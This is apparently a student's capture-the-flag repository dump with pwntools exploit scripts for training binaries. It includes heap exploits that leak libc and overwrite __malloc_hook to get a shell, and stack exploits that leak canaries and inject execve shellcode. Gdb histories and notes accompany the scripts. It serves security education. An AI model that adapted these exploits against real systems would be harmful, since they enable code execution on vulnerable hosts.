2 | # -*- coding: utf-8 -*- 3 | # This exploit template was generated via: 4 | # $ pwn template --host training.jinblack.it --port 65535 pkm_nopie_notimer 5 | from pwn import * 6 | 7 | # Set up pwntools for the correct architecture 8 | exe = context.binary = ELF('pkm_nopie_notimer') 9 | libc = ELF("./libc-2.27_notcache.so") 10 | ld = ELF("./ld-2.27.so") 11 | 12 | # Many built-in settings can be controlled on the command-line and show up 13 | # in "args". For example, to dump all data sent/received, and disable ASLR 14 | # for all created processes... 15 | # ./exploit.py DEBUG NOASLR 16 | # ./exploit.py GDB HOST=example.com PORT=4141 17 | host = args.HOST or 'bin.training.jinblack.it' 18 | port = int(args.PORT or 2025) 19 | 20 | def start_local(argv=[], *a, **kw): 21 | '''Execute the target binary locally''' 22 | if args.GDB: 23 | return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw) 24 | else: 25 | return process([exe.path] + argv, *a, **kw) 26 | 27 | def start_remote(argv=[], *a, **kw): 28 | '''Connect to the process on the remote host''' 29 | io = connect(host, port) 30 | if args.GDB: 31 | gdb.attach(io, gdbscript=gdbscript) 32 | return io 33 | 34 | def start(argv=[], *a, **kw): 35 | '''Start the exploit against the target.''' 36 | if args.LOCAL: 37 | return start_local(argv, *a, **kw) 38 | else: 39 | return start_remote(argv, *a, **kw) 40 | 41 | # Specify your GDB script here for debugging 42 | # GDB will be launched if the exploit is run via e.g. 43 | # ./exploit.py GDB 44 | gdbscript = ''' 45 | init-peda 46 | tbreak main 47 | break *0x0040166d 48 | continue 49 | '''.format(**locals()) 50 | 51 | #=========================================================== 52 | # EXPLOIT GOES HERE 53 | #=========================================================== 54 | # Arch: amd64-64-little 55 | # RELRO: Partial RELRO 56 | # Stack: Canary found 57 | # NX: NX enabled 58 | # PIE: No PIE (0x3ff000) 59 | 60 | io = start() 61 | 62 | def add(): 63 | io.recvuntil('> ') 64 | io.sendline(b'0') 65 | 66 | def rename(n, name): 67 | #sleep(.05) 68 | io.recvuntil('> ') 69 | io.sendline(b'1') 70 | #sleep(.05) 71 | io.recvuntil('> ') 72 | #sleep(.05) 73 | io.sendline(b'{}'.format(n)) 74 | #sleep(.05) 75 | io.recvuntil('[.] insert length: ') 76 | io.sendline(b'{}'.format(len(name))) 77 | io.sendline(b'{}'.format(name)) 78 | 79 | def delete(n): 80 | io.recvuntil('> ') 81 | io.sendline(b'2') 82 | #sleep(.05) 83 | io.recvuntil('> ') 84 | io.sendline(b'{}'.format(n)) 85 | 86 | def info(n): 87 | io.recvuntil('> ') 88 | io.sendline(b'4') 89 | io.sendline(b'{}'.format(n)) 90 | io.recvuntil('Name:') 91 | name = io.recvuntil('\n') 92 | return name 93 | 94 | # alloc 50 pkms 95 | for i in range(8): 96 | add() 97 | 98 | rename(0, 'A' * 0xf8) 99 | rename(1, 'B' * 0x68) 100 | rename(2, 'C' * 0xf8) 101 | rename(3, 'D' * 0x10) 102 | 103 | # delete chunk and move it down the heap 104 | rename(0, 'a' * 0xff) 105 | 106 | #delete(1) 107 | rename(1, 'B' * 0x68) 108 | 109 | for i in range(0x66, 0x5f, -1): 110 | rename(1, 'B' * i + '\x70\x01') 111 | 112 | # checkpoint 113 | 114 | rename(2, 'E' * 0xf6) 115 | 116 | libc_offset = 0x3e2c80 117 | libc_leak = info(1)[:-1] # somehow there was a character more '0xa7' 118 | libc_leak = unpack(libc_leak + (8-len(libc_leak))*'\x00', 64) / 256 119 | libc_base = libc_leak - libc_offset 120 | 121 | print('[!] libc_leak: {}'.format(hex(libc_leak))) 122 | print('[!] libc_base: {}'.format(hex(libc_base))) 123 | 124 | # restore the size field (0x70) of chunk_BBB 125 | for i in range(0xfd, 0xf7, -1): 126 | #sleep(.05) 127 | rename(2, 'E'*i + '\x70') # chunk_EEE, new_idx = 1 128 | 129 | delete(0) 130 | delete(1) 131 | delete(2) 132 | #add() 133 | #add() 134 | #add() 135 | #rename(1, 'b' * 0x2ff) 136 | #rename(2, 'e' * 0x2ff) 137 | 138 | hook_offset = 0x3e2bed 139 | hook = libc_base + hook_offset 140 | 141 | #foo = 0xdeadbeef 142 | rename(4, 'F' * 0x100 + p64(hook).strip('\x00')) 143 | 144 | # restore the size field (0x70) of the free'd chunk_BBB 145 | for i in range(0xfe, 0xf7, -1): 146 | #sleep(.05) 147 | rename(4, 'f'*i + '\x70') # new_idx = 0 148 | 149 | rename(5, 'B' * 0x68) 150 | 151 | foo = libc_base + 0x4e4d2 152 | rename(6, 'G' * 0x13 + p64(foo) + 'G' * 0x4d) 153 | 154 | 155 | add() 156 | 157 | #print(info(1)) 158 | 159 | io.sendline('cat flag') 160 | output = io.recvline() 161 | 162 | io.interactive() 163 | 164 | 165 | 166 | 167 | 168 | 169 | 170 | 171 | 172 | 173 | 174 | 175 | 176 | 177 | 178 | 179 | 180 | -------------------------------------------------------------------------------- /heap/pkm/ld-2.27.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Vechus/ODC-challenges/6c7a50f9fd4c9d575bdf4ae09eaf4b0449403973/heap/pkm/ld-2.27.so -------------------------------------------------------------------------------- /heap/pkm/libc-2.27_notcache.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Vechus/ODC-challenges/6c7a50f9fd4c9d575bdf4ae09eaf4b0449403973/heap/pkm/libc-2.27_notcache.so -------------------------------------------------------------------------------- /heap/pkm/libc.so.6: -------------------------------------------------------------------------------- 1 | libc-2.27_notcache.so -------------------------------------------------------------------------------- /heap/pkm/notes.txt: -------------------------------------------------------------------------------- 1 | malloc arbitrary n bytes: get_string 2 | 3 | BUT frees the previous string if it is not the default one 4 | solution: alloc all 50 pkm at start, then rename them one by one and delete for freeing the chunks. 5 | 6 | 7 | -------------------------------------------------------------------------------- /heap/pkm/peda-session-pkm_nopie_notimer.txt: -------------------------------------------------------------------------------- 1 | break *0x0040166d 2 | 3 | -------------------------------------------------------------------------------- /heap/pkm/pkm_nopie: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Vechus/ODC-challenges/6c7a50f9fd4c9d575bdf4ae09eaf4b0449403973/heap/pkm/pkm_nopie -------------------------------------------------------------------------------- /heap/pkm/pkm_nopie_notimer: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Vechus/ODC-challenges/6c7a50f9fd4c9d575bdf4ae09eaf4b0449403973/heap/pkm/pkm_nopie_notimer -------------------------------------------------------------------------------- /heap/pkm/pkm_nopie_notimer_patched: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Vechus/ODC-challenges/6c7a50f9fd4c9d575bdf4ae09eaf4b0449403973/heap/pkm/pkm_nopie_notimer_patched -------------------------------------------------------------------------------- /heap/pkm/solve.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | exe = ELF("./pkm_nopie_patched") 6 | libc = ELF("./libc-2.27_notcache.so") 7 | ld = ELF("./ld-2.27.so") 8 | 9 | context.binary = exe 10 | 11 | 12 | def conn(): 13 | if args.LOCAL: 14 | r = process([exe.path]) 15 | if args.DEBUG: 16 | gdb.attach(r) 17 | else: 18 | r = remote("addr", 1337) 19 | 20 | return r 21 | 22 | 23 | def main(): 24 | r = conn() 25 | 26 | # good luck pwning :) 27 | 28 | r.interactive() 29 | 30 | 31 | if __name__ == "__main__": 32 | main() 33 | -------------------------------------------------------------------------------- /heap/playground/.gdb_history: -------------------------------------------------------------------------------- 1 | b main 2 | r 3 | vmmap 4 | ni 5 | vmmap 6 | ni 7 | ni 8 | vmmap 9 | b main+326 10 | b main +326 11 | b (main+326) 12 | b *0x55555555531f 13 | c 14 | c 15 | run 16 | c 17 | vmmap 18 | x/30gx 0x0000555555559000 19 | c 20 | x/30gx 0x0000555555559000 21 | c 22 | run 23 | c 24 | c 25 | c 26 | c 27 | x/20gx 0x555555559280 28 | indo address malloc 29 | info address malloc 30 | vmmap 31 | vmmap malloc 32 | vmmap 0x7ffff7dee690 33 | info address __malloc_hook 34 | vmmap 0x7ffff7dcdc30 35 | x/20gx 0x7ffff7dcdc30 36 | x/20gx 0x7ffff7dcdc30 - 0x10 37 | x/30gx 0x7ffff7dcdc30 - 0x20 38 | c 39 | c 40 | c 41 | vmmap 0x7ffff7dcdc30 42 | info address __malloc_hook 43 | x/30gx 0x7ffff7dcdc30 - 0x20 44 | c 45 | c 46 | c 47 | c 48 | r 49 | ni 50 | vmmap 0x5555555580a0 51 | vmmap 0x55555555a000 52 | p/x 0x55555555a000 - 0x5555555580a0 53 | ni 54 | p/x 0x55555555a000 - 0x5555555580a0 55 | info addr min_heap 56 | vmmap 57 | x/gx min_heap 58 | x/gx max_heap 59 | c 60 | x/gx min_heap 61 | x/gx max_heap 62 | c 63 | c 64 | r 65 | c 66 | c 67 | q 68 | break main 69 | r 70 | ni 71 | c 72 | q 73 | b main 74 | r 75 | ni 76 | info address min_heap 77 | info address max_heap 78 | info address main 79 | p/gx 0x5555555580a0 - 0x5555555551d9 80 | p/x 0x5555555580a0 - 0x5555555551d9 81 | q 82 | b main 83 | r 84 | x/50i main+100 85 | x/50i main+200 86 | q 87 | b *(main+373) 88 | r 89 | vmmap 0x7ffff7dcdca0 90 | info addr malloc 91 | info addr malloc_hook__ 92 | info addr __malloc_hook 93 | vmmap 94 | q 95 | init-peda 96 | q 97 | c 98 | c 99 | c 100 | vmmap 101 | info addr libc 102 | info shared 103 | info proc 104 | c 105 | p/x 0x00007ffff79e2000 - 0x7ffff7dcdc30 106 | p/x 0x7ffff7dcdc30 - 0x00007ffff79e2000 107 | c 108 | vmmap 0x7ffff7a313d5 109 | q 110 | x/20i main+350 111 | x/20i main+360 112 | q 113 | c 114 | si 115 | ni 116 | p $rsp & 0xf 117 | p/ $rsp & 0xf 118 | p/x $rsp & 0xf 119 | p/x $rsp && 0xf 120 | p/x $rsp & 0xf 121 | q 122 | c 123 | p $rsp+0x40 124 | x/x $rsp+0x40 125 | x/x $rsp+0x70 126 | q 127 | c 128 | si 129 | ni 130 | vmmap 131 | q 132 | c 133 | si 134 | ni 135 | q 136 | c 137 | vmmap 138 | q 139 | c 140 | p/x rsp 141 | p/x $rsp 142 | p/x 0x7fffffffd600 & 0xf 143 | q 144 | c 145 | si 146 | ni 147 | p/x $rsp 148 | p/x 0x7fffffffd5f8& 0xf 149 | q 150 | c 151 | si 152 | ni 153 | p/x $rsp 154 | p/x 0x7fffffffd5f8 & 0xf 155 | p/x $rsp + 0x40 156 | p/x $rsp + 0x70 157 | ni 158 | q 159 | c 160 | si 161 | ni 162 | p/x 0x7fffffffd5f8 & 0xf 163 | p/x 0x7fffffffd5f4 & 0xf 164 | p/x 0x7fffffffd5f0 & 0xf 165 | q 166 | c 167 | q 168 | c 169 | si 170 | ni 171 | c 172 | q 173 | c 174 | si 175 | ni 176 | q 177 | c 178 | vmmap 179 | q 180 | c 181 | si 182 | ni 183 | info addr __malloc_hook 184 | vmmap 0x7fffffffdf08 185 | vmmap 186 | ni 187 | q 188 | c 189 | q 190 | c 191 | c 192 | si 193 | ni 194 | q 195 | c 196 | si 197 | ni 198 | q 199 | c 200 | si 201 | ni 202 | q 203 | c 204 | c 205 | si 206 | ni 207 | q 208 | c 209 | si 210 | ni 211 | vmmap 0x7ffff7a7935b 212 | stack 70 213 | q 214 | c 215 | q 216 | c 217 | si 218 | ni 219 | q 220 | c 221 | ni 222 | -------------------------------------------------------------------------------- /heap/playground/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # -*- coding: utf-8 -*- 3 | # This exploit template was generated via: 4 | # $ pwn template --host training.jinblack.it --port 4010 playground 5 | from pwn import * 6 | 7 | # Set up pwntools for the correct architecture 8 | exe = context.binary = ELF('playground') 9 | 10 | # Many built-in settings can be controlled on the command-line and show up 11 | # in "args". For example, to dump all data sent/received, and disable ASLR 12 | # for all created processes... 13 | # ./exploit.py DEBUG NOASLR 14 | # ./exploit.py GDB HOST=example.com PORT=4141 15 | host = args.HOST or 'training.jinblack.it' 16 | port = int(args.PORT or 4010) 17 | 18 | def start_local(argv=[], *a, **kw): 19 | '''Execute the target binary locally''' 20 | if args.GDB: 21 | return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw) 22 | else: 23 | return process([exe.path] + argv, env={'LD_PRELOAD': './libc-2.27.so'}) 24 | 25 | def start_remote(argv=[], *a, **kw): 26 | '''Connect to the process on the remote host''' 27 | io = connect(host, port) 28 | if args.GDB: 29 | gdb.attach(io, gdbscript=gdbscript) 30 | return io 31 | 32 | def start(argv=[], *a, **kw): 33 | '''Start the exploit against the target.''' 34 | if args.LOCAL: 35 | return start_local(argv, *a, **kw) 36 | else: 37 | return start_remote(argv, *a, **kw) 38 | 39 | # Specify your GDB script here for debugging 40 | # GDB will be launched if the exploit is run via e.g. 41 | # ./exploit.py GDB 42 | gdbscript = ''' 43 | init-peda 44 | tbreak main 45 | break *(main+368) 46 | continue 47 | '''.format(**locals()) 48 | 49 | #=========================================================== 50 | # EXPLOIT GOES HERE 51 | #=========================================================== 52 | # Arch: amd64-64-little 53 | # RELRO: Partial RELRO 54 | # Stack: No canary found 55 | # NX: NX enabled 56 | # PIE: PIE enabled 57 | 58 | libc = ELF('./libc-2.27.so') 59 | 60 | io = start() 61 | 62 | io.recvuntil(b'pid: ') 63 | pid = int(io.recvuntil(b'\n')) 64 | io.recvuntil(b'main: ') 65 | main = int(io.recvuntil(b'\n'), 0) 66 | 67 | print('[!]pid = {}\n[!]main = {}'.format(pid, hex(main))) 68 | 69 | def malloc(n): 70 | io.recvuntil('> ') 71 | io.sendline('malloc ' + str(n)) 72 | io.recvuntil('==> ') 73 | return int(io.recvuntil(b'\n'), 0) 74 | 75 | def free(p): 76 | io.recvuntil('> ') 77 | io.sendline('free ' + hex(p)) 78 | io.recvuntil('==> ok') 79 | 80 | def show(p, n=1, v=False): 81 | io.recvuntil('> ') 82 | io.sendline('show ' + hex(p) + ' ' + str(n)) 83 | d = {} 84 | for i in range(n): 85 | pointer = int(io.recvuntil(b':')[:-1], 0) 86 | content = io.recvuntil(b'\n').strip(' ') 87 | #print('P = ' + str(pointer) + '; C = ' + content + ' len=' + str(len(content))) 88 | c = 0 89 | if len(content) != 1: 90 | c = int(content, 0) 91 | d[pointer] = c 92 | 93 | if v: 94 | for k in d: 95 | print(hex(k) + ': ' + hex(d[k])) 96 | 97 | return d 98 | 99 | def write(p, content): 100 | io.recvuntil('> ') 101 | io.sendline('write ' + hex(p) + ' ' + str(len(content))) 102 | io.recvuntil(b'==> read\n') 103 | io.send(content) 104 | io.recvuntil(b'==> done\n') 105 | 106 | a = malloc(0x410) 107 | b = malloc(500) # discard 108 | 109 | free(a) 110 | 111 | target = main + 0x2ec7 112 | print("[!]target: {}".format(hex(target))) 113 | # write to max_heap location (target) 114 | write(a + 8, p64(target - 0x10)) 115 | 116 | c = malloc(0x410) # discard 117 | 118 | print("[!] now max_heap should be different!") 119 | 120 | libc_leak = show(target, n=1, v=False)[target] 121 | 122 | print("[!] leak: {}".format(hex(libc_leak))) 123 | 124 | malloc_hook_location = libc_leak - 0x70 125 | libc.address = malloc_hook_location - 0x3ebc30 126 | 127 | bin_sh = next(libc.search(b'/bin/sh\0')) 128 | 129 | print("[!] bin_sh: {}".format(hex(bin_sh))) 130 | 131 | #write(c, p64(0xdeadbeef) + p64(bin_sh)) 132 | write(malloc_hook_location, p64(libc.symbols['system'])) 133 | 134 | io.recvuntil('> ') 135 | io.sendline('malloc ' + str(bin_sh)) 136 | 137 | io.interactive() -------------------------------------------------------------------------------- /heap/playground/libc-2.27.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Vechus/ODC-challenges/6c7a50f9fd4c9d575bdf4ae09eaf4b0449403973/heap/playground/libc-2.27.so -------------------------------------------------------------------------------- /heap/playground/playground: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Vechus/ODC-challenges/6c7a50f9fd4c9d575bdf4ae09eaf4b0449403973/heap/playground/playground -------------------------------------------------------------------------------- /mitigations/aslr/.gdb_history: -------------------------------------------------------------------------------- 1 | b main 2 | r 3 | disass main 4 | q 5 | q 6 | NOASLR 7 | q 8 | c 9 | disass main 10 | q 11 | disass main 12 | b *0x0000555555554a13 13 | c 14 | c 15 | c 16 | c 17 | q 18 | i b 19 | d b 20 | d breakpoints 21 | 1 22 | q 23 | c 24 | c 25 | q 26 | i b 27 | c 28 | c 29 | q 30 | i b 31 | delete breakpoints 32 | i b 33 | ni 34 | qq 35 | q 36 | q 37 | q 38 | q 39 | disass main 40 | q 41 | ni 42 | q 43 | disass main 44 | disass main | grep read 45 | disass main 46 | b *0x0000000000000a13 47 | r 48 | ni 49 | disass main 50 | q 51 | i b 52 | b main 53 | r 54 | disass main 55 | b *0x0000555555554a13 56 | c 57 | ni 58 | x/60x $rsp 59 | ni 60 | x/60x $rsp 61 | x/80x $rsp 62 | disass main 63 | x/80x $rsp 64 | c 65 | q 66 | i b 67 | b main 68 | c 69 | r 70 | disass main 71 | b *0x0000555555554a45 72 | c 73 | x/80x $rsp 74 | c 75 | x/80x $rsp 76 | c 77 | x/80x $rsp 78 | q 79 | i b 80 | b main 81 | c 82 | r 83 | disass main 84 | b *0x0000555555554a45 85 | c 86 | c 87 | x/80x $rsp 88 | c 89 | x/80x $rsp 90 | c 91 | x/80x $rsp 92 | q 93 | b main 94 | c 95 | r 96 | b main+229 97 | b main +229 98 | disass main 99 | b *0x0000555555554a45 100 | c 101 | c 102 | b main 103 | x/80x $rsp 104 | disass main 105 | x/80x $rsp 106 | q 107 | b main 108 | c 109 | r 110 | disass main 111 | b *0x0000555555554a45 112 | c 113 | x/60x *0x555555755080 114 | x/60x 0x555555755080 115 | x/80x $rsp 116 | q 117 | ni 118 | q 119 | ni 120 | q 121 | attach 1479 122 | disass main 123 | c 124 | attach 1511 125 | b *0x0000555555554a45 126 | c 127 | x/80x $rsp 128 | disass main 129 | x/60x 0x555555755080 130 | c 131 | x/80x $rsp 132 | c 133 | x/80x $rsp 134 | x/80s $rsp 135 | q 136 | b i 137 | b i 138 | i b 139 | attach 1591 140 | disass main 141 | b *0x0000555555554a45 142 | c 143 | c 144 | attach 1603 145 | i b 146 | c 147 | x/80s $rsp 148 | x/80x $rsp 149 | x/80x $rsp 150 | x/60x $rsp 151 | c 152 | c 153 | x/60x $rsp 154 | x/60s $rsp 155 | c 156 | c 157 | attach 1637 158 | c 159 | x/60s $rsp 160 | x/60x $rsp 161 | p/60x $rsp 162 | x/60x $rsp 163 | x/100x $rsp 164 | x/80d $rsp 165 | q 166 | -------------------------------------------------------------------------------- /mitigations/aslr/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # -*- coding: utf-8 -*- 3 | # This exploit template was generated via: 4 | # $ pwn template --host training.jinblack.it --port 2012 leakers 5 | from pwn import * 6 | 7 | # Set up pwntools for the correct architecture 8 | exe = context.binary = ELF('leakers') 9 | 10 | # Many built-in settings can be controlled on the command-line and show up 11 | # in "args". For example, to dump all data sent/received, and disable ASLR 12 | # for all created processes... 13 | # ./exploit.py DEBUG NOASLR 14 | # ./exploit.py GDB HOST=example.com PORT=4141 15 | host = args.HOST or 'training.jinblack.it' 16 | port = int(args.PORT or 2012) 17 | 18 | def start_local(argv=[], *a, **kw): 19 | '''Execute the target binary locally''' 20 | if args.GDB: 21 | return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw) 22 | else: 23 | return process([exe.path] + argv, *a, **kw) 24 | 25 | def start_remote(argv=[], *a, **kw): 26 | '''Connect to the process on the remote host''' 27 | io = connect(host, port) 28 | if args.GDB: 29 | gdb.attach(io, gdbscript=gdbscript) 30 | return io 31 | 32 | def start(argv=[], *a, **kw): 33 | '''Start the exploit against the target.''' 34 | if args.LOCAL: 35 | return start_local(argv, *a, **kw) 36 | else: 37 | return start_remote(argv, *a, **kw) 38 | 39 | # Specify your GDB script here for debugging 40 | # GDB will be launched if the exploit is run via e.g. 41 | # ./exploit.py GDB 42 | gdbscript = ''' 43 | tbreak main 44 | continue 45 | '''.format(**locals()) 46 | 47 | #=========================================================== 48 | # EXPLOIT GOES HERE 49 | #=========================================================== 50 | # Arch: amd64-64-little 51 | # RELRO: Partial RELRO 52 | # Stack: Canary found 53 | # NX: NX enabled 54 | # PIE: PIE enabled 55 | 56 | cg = cyclic_gen() 57 | 58 | sh = b'\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05' 59 | 60 | io = start() 61 | input() 62 | 63 | # send ps1 64 | io.sendline(sh) 65 | #io.sendline(b'aaaaaaaaaaaaaaaaaaaaa') 66 | sleep(0.5) 67 | # retreive address 68 | io.sendline(cg.get(56)) 69 | sleep(0.5) 70 | 71 | #io.interactive() 72 | 73 | io.recvuntil(b'maaanaaa') 74 | 75 | 76 | # we have a pointer at 0x200573 distance 77 | target = io.recv(6) 78 | target += b'\x00\x00' 79 | code_pos = u64(target) + 0x200576 80 | 81 | log.info('target {}\ncode is at: {}'.format(target, code_pos)) 82 | 83 | # ROUND 2 84 | io.send(cyclic_gen().get(105)) 85 | 86 | io.recvuntil(b'aabb') 87 | 88 | fake_canary = io.recv(7) 89 | canary = b'\x00' + fake_canary 90 | 91 | log.info('canary: {}'.format(canary)) 92 | 93 | io.send(cg.get(104) + canary + cg.get(8) + p64(code_pos)) 94 | 95 | # FINISH HIM! 96 | io.sendline() 97 | 98 | io.interactive() 99 | -------------------------------------------------------------------------------- /mitigations/aslr/leakers: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Vechus/ODC-challenges/6c7a50f9fd4c9d575bdf4ae09eaf4b0449403973/mitigations/aslr/leakers -------------------------------------------------------------------------------- /mitigations/gonnaleak/.gdb_history: -------------------------------------------------------------------------------- 1 | r 2 | q 3 | break main 4 | r 5 | q 6 | i b 7 | b *0x004011d9 8 | r 9 | x/60x $rsp 10 | python3 11 | q 12 | b *0x004011d9 13 | r 14 | x/60x $rsp 15 | c 16 | x/60x $rsp 17 | q 18 | b *0x004011d9 19 | r 20 | x/60x $rsp 21 | q 22 | b *0x004011d9 23 | r 24 | x/60x $rsp 25 | disass main 26 | q 27 | c 28 | x/60x $rsp 29 | q 30 | c 31 | x/60x $rsp 32 | c 33 | c 34 | c 35 | c 36 | c 37 | x/60x $rsp 38 | c 39 | q 40 | c 41 | c 42 | q 43 | c 44 | c 45 | c 46 | x/60x $rsp 47 | q 48 | c 49 | q 50 | c 51 | x/60x $rsp 52 | c 53 | x/60x $rsp 54 | q 55 | c 56 | c 57 | x/60x $rsp 58 | c 59 | ls 60 | x/60x $rsp 61 | c 62 | c 63 | ls 64 | q 65 | c 66 | x/60x $rsp 67 | c 68 | x/60x $rsp 69 | q 70 | c 71 | c 72 | c 73 | q 74 | c 75 | x/60x $rsp 76 | c 77 | x/60x $rsp 78 | c 79 | q 80 | c 81 | x/60x $rsp 82 | q 83 | c 84 | c 85 | c 86 | c 87 | c 88 | c 89 | q 90 | b main 91 | r 92 | vmmap -r 93 | uname -r 94 | q 95 | -------------------------------------------------------------------------------- /mitigations/gonnaleak/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # -*- coding: utf-8 -*- 3 | # This exploit template was generated via: 4 | # $ pwn template --host training.jinblack.it --port 2011 leakers 5 | from pwn import * 6 | 7 | # Set up pwntools for the correct architecture 8 | exe = context.binary = ELF('leakers') 9 | 10 | # Many built-in settings can be controlled on the command-line and show up 11 | # in "args". For example, to dump all data sent/received, and disable ASLR 12 | # for all created processes... 13 | # ./exploit.py DEBUG NOASLR 14 | # ./exploit.py GDB HOST=example.com PORT=4141 15 | host = args.HOST or 'training.jinblack.it' 16 | port = int(args.PORT or 2011) 17 | 18 | def start_local(argv=[], *a, **kw): 19 | '''Execute the target binary locally''' 20 | if args.GDB: 21 | return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw) 22 | else: 23 | return process([exe.path] + argv, *a, **kw) 24 | 25 | def start_remote(argv=[], *a, **kw): 26 | '''Connect to the process on the remote host''' 27 | io = connect(host, port) 28 | if args.GDB: 29 | gdb.attach(io, gdbscript=gdbscript) 30 | return io 31 | 32 | def start(argv=[], *a, **kw): 33 | '''Start the exploit against the target.''' 34 | if args.LOCAL: 35 | return start_local(argv, *a, **kw) 36 | else: 37 | return start_remote(argv, *a, **kw) 38 | 39 | # Specify your GDB script here for debugging 40 | # GDB will be launched if the exploit is run via e.g. 41 | # ./exploit.py GDB 42 | gdbscript = ''' 43 | tbreak main 44 | b *0x4011d9 45 | continue 46 | '''.format(**locals()) 47 | 48 | #=========================================================== 49 | # EXPLOIT GOES HERE 50 | #=========================================================== 51 | # Arch: amd64-64-little 52 | # RELRO: Partial RELRO 53 | # Stack: Canary found 54 | # NX: NX disabled 55 | # PIE: No PIE (0x400000) 56 | # RWX: Has RWX segments 57 | 58 | 59 | sh = b'\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05' 60 | 61 | cg = cyclic_gen() 62 | 63 | io = start() 64 | 65 | # ROUND 1 - FIGHT! 66 | io.send(cg.get(32)) 67 | io.recvuntil(b'haaa') 68 | 69 | # we have a pointer at 0x88 distance 70 | target = io.recv(6) 71 | target += b'\x00\x00' 72 | code_pos = u64(target) - 136 73 | 74 | log.info('target {}\ncode is at: {}'.format(target, code_pos)) 75 | 76 | # ROUND 2 77 | io.send(cg.get(105)) 78 | 79 | io.recvuntil(b'aabj') 80 | 81 | fake_canary = io.recv(7) 82 | canary = b'\x00' + fake_canary 83 | 84 | log.info('canary: {}'.format(canary)) 85 | 86 | # ROUND 3 - K.O. 87 | io.send(sh + b'\x90' * (104 - len(sh)) + canary + cg.get(8) + p64(code_pos)) 88 | 89 | # FINISH HIM! 90 | io.sendline() 91 | 92 | io.interactive() 93 | 94 | #print(target) 95 | 96 | #print(canary) 97 | #print(len(canary)) 98 | -------------------------------------------------------------------------------- /mitigations/gonnaleak/leakers: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Vechus/ODC-challenges/6c7a50f9fd4c9d575bdf4ae09eaf4b0449403973/mitigations/gonnaleak/leakers -------------------------------------------------------------------------------- /mitigations/leakers/.gdb_history: -------------------------------------------------------------------------------- 1 | b *0x0040120 2 | ls 3 | c 4 | disass main 5 | b *0x0000000000401205 6 | c 7 | d b2 8 | i b 9 | d b 10 | d breakpoints 11 | o b 12 | i b 13 | b *0x0000000000401205 14 | i b 15 | c 16 | x/60x rsp 17 | x/60x $rsp 18 | b *0x040122e 19 | c 20 | ni 21 | p qword ptr fs:[0x28] 22 | ni 23 | p/x $rbp 24 | x/x $rbp 25 | x/x $rbp+8 26 | c 27 | c 28 | q 29 | i b 30 | b 0x0040122e 31 | b *0x0040122e 32 | c 33 | x/x $rbp+8 34 | x/x $rbp 35 | x/x $rbp+8 36 | x/x $rbp+16 37 | x/x $rbp+24 38 | x/x $rbp+32 39 | x/x $rbp+36 40 | x/60x $rbp 41 | x/60x $rsp 42 | x/60x $rsp 43 | c 44 | q 45 | q 46 | c 47 | i b 48 | c 49 | q 50 | c 51 | p $fs 52 | p $fs[0x28] 53 | p $fs 54 | p $fs+0x28 55 | p $fs:0x28 56 | p $fs 57 | xor rcx, rcx 58 | xor $rcx, $rcx 59 | q 60 | q 61 | c 62 | x/60x $rsp 63 | q 64 | q 65 | c 66 | ni 67 | x/60x $rsp 68 | q 69 | c 70 | ni 71 | p $rcx 72 | p/x $rcx 73 | show stack 74 | show $rbp 75 | ni 76 | q 77 | c 78 | ni 79 | x/60x rsp 80 | x/60x $rsp 81 | c 82 | q 83 | ni 84 | x/60x $rsp 85 | x/60x $rsp 86 | c 87 | ni 88 | x/60x $rsp 89 | q 90 | c 91 | ni 92 | x/60x $rsp 93 | q 94 | c 95 | x/60x $rsp 96 | ni 97 | q 98 | c 99 | ni 100 | x/60x $rsp 101 | q 102 | c 103 | ni 104 | x/60x $rsp 105 | q 106 | c 107 | ni 108 | x/60x $rsp 109 | clear 110 | q 111 | c 112 | ni 113 | x/60x $rsp 114 | q 115 | c 116 | q 117 | c 118 | c 119 | q 120 | c 121 | q 122 | c 123 | q 124 | c 125 | q 126 | -------------------------------------------------------------------------------- /mitigations/leakers/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # -*- coding: utf-8 -*- 3 | # This exploit template was generated via: 4 | # $ pwn template --host training.jinblack.it --port 2010 leakers 5 | from pwn import * 6 | 7 | # Set up pwntools for the correct architecture 8 | exe = context.binary = ELF('leakers') 9 | 10 | # Many built-in settings can be controlled on the command-line and show up 11 | # in "args". For example, to dump all data sent/received, and disable ASLR 12 | # for all created processes... 13 | # ./exploit.py DEBUG NOASLR 14 | # ./exploit.py GDB HOST=example.com PORT=4141 15 | host = args.HOST or 'training.jinblack.it' 16 | port = int(args.PORT or 2010) 17 | 18 | def start_local(argv=[], *a, **kw): 19 | '''Execute the target binary locally''' 20 | if args.GDB: 21 | return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw) 22 | else: 23 | return process([exe.path] + argv, *a, **kw) 24 | 25 | def start_remote(argv=[], *a, **kw): 26 | '''Connect to the process on the remote host''' 27 | io = connect(host, port) 28 | if args.GDB: 29 | gdb.attach(io, gdbscript=gdbscript) 30 | return io 31 | 32 | def start(argv=[], *a, **kw): 33 | '''Start the exploit against the target.''' 34 | if args.LOCAL: 35 | return start_local(argv, *a, **kw) 36 | else: 37 | return start_remote(argv, *a, **kw) 38 | 39 | # Specify your GDB script here for debugging 40 | # GDB will be launched if the exploit is run via e.g. 41 | # 